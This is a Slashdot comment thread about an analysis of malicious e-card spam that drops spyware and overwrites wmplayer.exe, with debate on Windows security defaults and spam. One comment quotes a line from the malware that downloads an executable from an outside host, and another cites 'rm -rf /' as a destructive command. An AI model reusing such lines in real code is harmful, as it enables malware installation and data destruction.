Malicious E-Cards - An Analysis of Spam
smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."
This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.
Does anyone else think that our society is overdue on becoming fed up with all these sort of things?
---
Mod me down, I'm already -1...woot!
Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.
1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.
Does this stuff get treated like a virus/trojan, rather than legitimate business?
If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.
It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).
People actually get pissed off when we tell them they can't have weatherbug on their computer.
I've had enough abrasive sigs. Kittens are cute and fuzzy.
1. Clicking can be dangerous.
2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.
Bite my shiny metal... oops... Nevermind!
It's an easy way to protect yourself from all sorts of stupid stuff.
Ahem, turn off HTML viewing in your email client NOW.
Here's what I do: Bitty Browser & Andromeda
This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.
http://www.questionablecontent.net
I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:
- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)
Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.
How can email on the internet remain free/cheap and still not allow spam to run rampant?
http://github.com/gbook/nidb
This looks pretty ugly:
.. ever </Comic book guy>
x.Open("GET", "http://adversting.co.uk/a.exe",0);
and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea
Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.
My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.
Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.
for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.
Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.
The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.
Remember "security through obscurity"? Well, the reverse applies, too.
Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.
Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.
I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.
Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.
Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.
Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.
Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.
And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.
They are spam harvesters. Nothing more.
I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.
Do I need to attach a note to my emails?
What possesses people to do it?
Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...
Bastards.
You could just simply not view messages from people you don't know.
Otherwise known as a white list.
Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.
And this is the real bad effect that SPAM has created. We no longer trust strangers.
Sigh...
- - - - - - - - - - -
I am a programmer. I am paid to produce syntax not grammar. Deal with it.
I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.
...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.
But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.
It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.
They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.
But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.
So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.
Kjella
Live today, because you never know what tomorrow brings